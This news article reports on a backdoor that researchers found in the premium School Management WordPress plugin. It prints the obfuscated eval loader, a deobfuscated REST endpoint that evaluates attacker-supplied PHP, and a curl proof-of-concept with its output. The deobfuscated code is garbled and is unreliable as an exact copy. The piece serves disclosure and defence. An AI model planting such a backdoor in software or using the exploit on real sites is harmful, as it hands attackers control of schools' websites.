Researchers Discover Backdoor in WordPress Plugin Used by Schools

A cartoon door leads to a wall of computer code.

Researchers said Friday they found a malicious backdoor in a WordPress plugin that gave attackers full control of websites that used the package, which is marketed to schools.

The premium version of School Management, a plugin used by schools to operate and manage their websites, has contained the backdoor since at least version 8.9, researchers at website security service Jetpack said in a blog post without exclude that it was present in earlier versions. . This page from a third-party site shows that version 8.9 was released last August.

Obvious backdoor

Jetpack said it discovered the backdoor after members of the support team reported finding heavily obfuscated code on several sites that used School Management Pro. After deobfuscating it, they realized that the code, hidden in the license verification part of the plugin, was intentionally placed there in order to give outsiders the ability to take over the sites.

“The code itself isn’t that interesting: it’s an obvious backdoor injected into the plugin’s license verification code,” Jetpack’s post said. “It allows any attacker to execute arbitrary PHP code on the site with the plugin installed.”

In its obfuscated form, the code looked like this:

$_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "\x6c\x61\x74" . "\x65\x28\x62"."\x61\x73\x65\x36"."\x34\x5f\x64\x65\x63\x6f\x64\x65\x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs="" . str_repeat(chr(0x29), 3)."\x3b");
class WLSM_Crypt_Blowfish_DefaultKey

After deobfuscation, the code was:

add_action( "rest_api_init', function() {
                'am-member', 'license',
                        'methods'  => WP_REST_Server::CREATABLE,
                        'callback' => function( $request ) {
                                $args = $request->get_params();
                                if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
                                        eval( $args['blowf'] );
} );

The researchers wrote a proof-of-concept exploit that confirmed that the obfuscated code was indeed a backdoor that allowed anyone with knowledge of it to run code of their choosing on any site running the plugin.

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in /var/www/html/wp-includes/rest-api/class-wp-rest-server.php on line 1713

The mystery remains

The number of sites using the plugin is unclear. Indian School Management maker Weblizar says on its homepage that it has “340k+” customers for its free and premium themes and plugins, but the Jetpack backdoor found was only in School Management Pro. The backdoor was not in the free version of the plugin, and there is no indication that it was placed in any other plugins released by Weblizar.

“We tried to get more information from the vendor on when the backdoor was injected, what versions were affected, and how the code ended up in the plugin in the first place,” the post reads. . “That effort was unsuccessful because the vendor says it doesn’t know when or how the code entered its software.”

Attempts to contact Weblizar were unsuccessful.

Now that the presence of the backdoor is public knowledge, attackers are likely to exploit it on any website using a vulnerable version of the plugin. Anyone using this plugin should update immediately. Even after patching, they should also carefully scan their site for signs of compromise, as the update will not remove any new backdoors that may have been added.

Add Comment